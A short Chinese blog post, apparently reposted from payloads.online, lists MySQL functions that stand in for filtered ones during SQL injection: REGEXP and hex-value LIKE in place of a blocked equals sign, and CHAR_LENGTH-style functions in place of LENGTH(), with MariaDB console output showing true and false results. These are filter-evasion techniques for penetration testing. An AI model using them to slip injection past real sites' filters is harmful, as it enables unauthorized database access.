MySQL 注入一些等价函数 « 倾旋的博客
2019-07-04 15:23:46 Author: payloads.online(查看原文) 阅读量:441 收藏

本文记录一些MySQL注入一些等价函数

过滤 = 等号

REGEXP =>

MariaDB [test]> select `req.host` from flow where id = 581 AND 1 REGEXP 1;
+---------------------------+
| req.host                  |
+---------------------------+
| init-p01st.push.apple.com |
+---------------------------+
1 row in set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 1 REGEXP 2;
Empty set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 0xef LIKE 0xef;
+---------------------------+
| req.host                  |
+---------------------------+
| init-p01st.push.apple.com |
+---------------------------+
1 row in set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 0xef LIKE 0xea;
Empty set (0.00 sec)

过滤 LENGTH()

CHAR_LENGTH => OCTET_LENGTH() => CHARACTER_LENGTH() =>

MariaDB [test]> select char_length('s');
+------------------+
| char_length('s') |
+------------------+
|                1 |
+------------------+
1 row in set (0.00 sec)

MariaDB [test]> select char_length('admin');
+----------------------+
| char_length('admin') |
+----------------------+
|                    5 |
+----------------------+
1 row in set (0.00 sec)

文章来源: https://payloads.online/archivers/2018-08-12/2
如有侵权请联系:admin#unsafe.sh